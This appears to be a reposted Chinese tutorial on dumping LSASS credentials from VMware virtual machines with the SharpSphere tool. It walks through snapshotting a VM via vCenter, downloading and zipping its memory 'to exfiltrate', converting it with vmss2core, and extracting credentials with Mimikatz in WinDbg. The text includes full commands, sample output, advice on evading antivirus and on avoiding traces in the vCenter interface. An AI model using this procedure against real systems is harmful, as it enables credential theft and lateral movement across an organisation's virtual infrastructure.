溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

如何理解SharpSphere dump LSASS內(nèi)存

發(fā)布時(shí)間:2021-10-18 15:14:36 來源:億速云 閱讀:128 作者:iii 欄目:編程語言

這篇文章主要介紹“如何理解SharpSphere dump LSASS內(nèi)存”,在日常操作中,相信很多人在如何理解SharpSphere dump LSASS內(nèi)存問題上存在疑惑,小編查閱了各式資料,整理出簡單好用的操作方法,希望對大家解答”如何理解SharpSphere dump LSASS內(nèi)存”的疑惑有所幫助!接下來,請跟著小編一起來學(xué)習(xí)吧!

但是到現(xiàn)在為止,在實(shí)際操作上很難發(fā)揮作用,主要原因是:

1.需要驗(yàn)證vCenter/ESXi

2.為目標(biāo)VM創(chuàng)建帶有內(nèi)存的的快照

3.需要將數(shù)據(jù)下載到本地,(通常非常大).vmem.vmsn文件

4.通過Volatility來運(yùn)行

5.使用vmss2core轉(zhuǎn)換為.dmp并通過Mimikatz 和 WinDbg運(yùn)行

參數(shù)

Z:\>SharpSphere.exe dump --help
SharpSphere 1.0.0.0
Copyright ?  2020

  --url            Required. vCenter SDK URL, i.e. https://127.0.0.1/sdk

  --username       Required. vCenter username, i.e. administrator@vsphere.local

  --password       Required. vCenter password

  --targetvm       Required. VM to snapshot

  --snapshot       (Default: false) WARNING: Creates and then deletes a snapshot. If unset, SharpSphere will only
                   extract memory from last existing snapshot, or none if no snapshots are available.

  --destination    Required. Full path to the local directory where the file should be downloaded

  --help           Display this help screen.

  --version        Display version information.

–snapshot

默認(rèn)情況下,SharpSphere不會試圖創(chuàng)建一個(gè)快照,而會試圖從現(xiàn)有的快照找到有效.vmem.vmsn文件。從OpSec的角度來看,這是可取的,因?yàn)閁I中沒有證據(jù),但是不能保證目標(biāo)上有快照,而且這些快照有沒有捕獲了VM的內(nèi)存也是問題。所以如果現(xiàn)有快照不存在,SharpSphere將退出。

所以--snapshot參數(shù)規(guī)定,SharpSphere會創(chuàng)建一個(gè)名為System Backup [TIMESTAMP]的快照,下載相關(guān)聯(lián)的“.vmem.vmsn文件,然后刪除快照一旦完成。Recent Tasks窗口中的其他用戶將同時(shí)看到快照的創(chuàng)建和刪除。

如何理解SharpSphere dump LSASS內(nèi)存

當(dāng)然--snapshot可以先查看是否存在現(xiàn)有快照

-destination

SharpSphere需要從快照下載兩個(gè)文件,一個(gè)大小等于分配給該機(jī)器的RAM的(即4GB,8GB,16GB等)的.vmem文件,以及一個(gè)小得多的.vmsn文件。它將這些文件下載到--destination指定的目錄中。但下載完這兩個(gè)文件,SharpSphere會將它們都添加到具有隨機(jī)名稱的zip文件中,然后將其刪除。

介紹

1.使用以下參數(shù)執(zhí)行SharpSphere(提示:使用獲取虛擬機(jī)名稱list):

SharpSphere.exe dump --url https://[IP or FQDN]/sdk --username [USERNAME] --password [PASSWORD] --targetvm [NAME OF VM] --destination [LOCATION TO DOWNLOAD FILES]

示例輸出

C:\Users\Administrator\Desktop>SharpSphere.exe dump --url https://vcenter.globex.com/sdk --username administrator@vsphere.local --password Password1! --targetvm "Windows 10" --destination "C:\Users\Public"
 [x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates
 [x] Creating vSphere API interface, takes a few minutes...
 [x] Connected to VMware vCenter Server 7.0.1 build-17005016
 [x] Successfully authenticated
 [x] Finding existing snapshots for Windows 10...
 Error: No existing snapshots found for the VM Windows 10, recommend you try again with --snapshot set

2.如果不存在快照,添加一個(gè)參數(shù)--snapshot

SharpSphere.exe dump --url https://vcenter.globex.com/sdk --username administrator@vsphere.local --password Password1! --targetvm "Windows 10" --destination "C:\Users\Public" --snapshot
 [x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates
 [x] Creating vSphere API interface, takes a few minutes...
 [x] Connected to VMware vCenter Server 7.0.1 build-17005016
 [x] Successfully authenticated
 [x] Creating snapshot for VM Windows 10...
 [x] Snapshot created successfully
 [x] Downloading Windows 10-Snapshot51.vmem (4096MB) to C:\Users\Public\z53dqmxx.5bz...
 [x] Downloading Windows 10-Snapshot51.vmsn to C:\Users\Public\hwu5gv2d.ezv...
 [x] Download complete, zipping up so it's easier to exfiltrate...
 [x] Zipping complete, download C:\Users\Public\cec0kwgk.b2m (916MB), rename to .zip, and follow instructions to use with Mimikatz
 [x] Deleting the snapshot we created

3.如果你使用cs之類的工具,可以直接在目標(biāo)機(jī)器上加載遠(yuǎn)程加載程序?;蛘?,將工具上傳到目標(biāo)機(jī)上,但要做好免殺處理。

4.在這種情況下cec0kwgk.b2m,將隨機(jī)重命名為zip文件,然后解壓縮這兩個(gè)文件。較大的是您的.vmem文件。

5.下載vmss2core并先提供較小的.vmsn文件,然后再提供較大的.vmem文件。如果目標(biāo)VM是Microsoft Windows 8 / 8.1,Windows Server 2012,Windows Server 2016或Windows Server 2019,則執(zhí)行以下命令-W8

vmss2core-sb-8456865.exe -W8 hwu5gv2d.ezv z53dqmxx.5bz

否則使用-W

vmss2core-sb-8456865.exe -W hwu5gv2d.ezv z53dqmxx.5bz

6.下載WinDbg并加載.dmp文件。vmss2core Crash Dump

7.下載Mimikatz并使用WinDbg加載Mimilib.dll

.load C:\Tools\Mimikatz\x64\mimilib.dll

8.查找LSASS 進(jìn)程

!process 0 0 lsass.exe

9.切換進(jìn)程

.process /r /p ffffc70462d020c0

10.獲取憑證

!mimikatz?

到此,關(guān)于“如何理解SharpSphere dump LSASS內(nèi)存”的學(xué)習(xí)就結(jié)束了,希望能夠解決大家的疑惑。理論與實(shí)踐的搭配能更好的幫助大家學(xué)習(xí),快去試試吧!若想繼續(xù)學(xué)習(xí)更多相關(guān)知識,請繼續(xù)關(guān)注億速云網(wǎng)站,小編會繼續(xù)努力為大家?guī)砀鄬?shí)用的文章!

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI